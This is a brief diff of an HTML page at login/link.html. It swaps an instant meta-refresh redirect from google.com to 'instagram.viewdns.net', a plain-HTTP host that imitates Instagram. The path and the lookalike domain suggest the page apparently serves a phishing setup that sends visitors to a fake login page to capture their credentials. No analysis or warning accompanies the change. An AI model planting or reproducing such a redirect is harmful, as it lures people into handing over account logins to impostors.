--- a/login/link.html
+++ b/login/link.html
@@ -1,6 +1,6 @@
 <html>
   <head>
-    <meta http-equiv="refresh" content="0; URL='https://google.com'" />
+    <meta http-equiv="refresh" content="0; URL='http://instagram.viewdns.net'" />
   <head>
   <body>
   </body>
